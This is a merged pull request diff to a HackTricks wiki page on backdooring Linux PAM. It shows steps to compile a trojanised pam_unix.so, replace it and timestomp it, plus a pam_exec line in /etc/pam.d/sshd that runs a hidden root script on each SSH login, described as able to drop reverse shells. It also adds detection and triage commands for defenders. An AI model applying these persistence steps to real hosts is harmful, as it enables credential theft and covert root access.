Merge pull request #1901 from HackTricks-wiki/research_update_src_linux-hardening_linux-post-exploitation_pam-pluggable-authentication-modules_20260216_131709

Research Update Enhanced src/linux-hardening/linux-post-expl...

Author: carlospolop

src/linux-hardening/linux-post-exploitation/pam-pluggable-authentication-modules.md

@@ -54,6 +54,9 @@ In a setup with multiple auth modules, the process follows a strict order. If th
 A classic persistence trick in high-value Linux environments is to **swap the legitimate PAM library with a trojanised drop-in**.  Because every SSH / console login ends up calling `pam_unix.so:pam_sm_authenticate()`, a few lines of C are enough to capture credentials or implement a *magic* password bypass.
 
 ### Compilation Cheatsheet
+<details>
+<summary>Sample `pam_unix.so` trojan</summary>
+
 ```c
 #define _GNU_SOURCE
 #include <security/pam_modules.h>
@@ -86,6 +89,8 @@ int pam_sm_authenticate(pam_handle_t *pamh, int flags, int argc, const char **ar
 }
 ```
 
+</details>
+
 Compile and stealth-replace:
 ```bash
 gcc -fPIC -shared -o pam_unix.so trojan_pam.c -ldl -lpam
@@ -102,15 +107,40 @@ touch -r /bin/ls /lib/security/pam_unix.so  # timestomp
 
 ### Detection
 * Compare MD5/SHA256 of `pam_unix.so` against distro package.
+* `rpm -V pam` or `debsums -s libpam-modules` to spot replaced libraries without manual hashing.
 * Check for world-writable or unusual ownership under `/lib/security/`.
 * `auditd` rule: `-w /lib/security/pam_unix.so -p wa -k pam-backdoor`.
+* Grep PAM configs for unexpected modules: `grep -R "pam_[a-z].*\.so" /etc/pam.d/ | grep -v pam_unix`.
 
-### References
+### Quick triage commands (post-compromise or threat hunting)
+```bash
+# 1) Spot alien PAM objects
+find /{lib,usr/lib,usr/local/lib}{,64}/security -type f -printf '%p %s %M %u:%g %TY-%Tm-%Td\n' | grep -E 'pam_|libselinux'
 
-- [https://hotpotato.tistory.com/434](https://hotpotato.tistory.com/434)
-- [Palo Alto Unit42 – Infiltration of Global Telecom Networks](https://unit42.paloaltonetworks.com/infiltration-of-global-telecom-networks/)
+# 2) Verify package integrity
+command -v rpm >/dev/null && rpm -V pam || debsums -s libpam-modules
 
-{{#include ../../banners/hacktricks-training.md}}
+# 3) Identify non-packaged PAM modules
+for f in /{lib,usr/lib,usr/local/lib}{,64}/security/*.so; do
+    dpkg -S "$f" >/dev/null 2>&1 || echo "UNPACKAGED: $f";
+done
 
+# 4) Look for stealth config edits
+grep -R "pam_.*\.so" /etc/pam.d/ | grep -E 'plg|selinux|custom|exec'
+```
+
+### Abusing `pam_exec` for persistence
+Instead of replacing `pam_unix.so`, a lighter touch is to append a `pam_exec` line in `/etc/pam.d/sshd` so every SSH login launches an implant while leaving the normal stack intact:
+```bash
+# Prepend to /etc/pam.d/sshd
+session optional pam_exec.so quiet /usr/local/bin/.ssh_hook.sh
+```
+`pam_exec` runs as root inside the sshd PAM context, so the script can drop reverse shells, collect env vars, or re-open implanted sockets with no filesystem changes to core libraries.
 
 
+## References
+
+- [https://hotpotato.tistory.com/434](https://hotpotato.tistory.com/434)
+- [Palo Alto Unit42 – Infiltration of Global Telecom Networks](https://unit42.paloaltonetworks.com/infiltration-of-global-telecom-networks/)
+
+{{#include ../../banners/hacktricks-training.md}}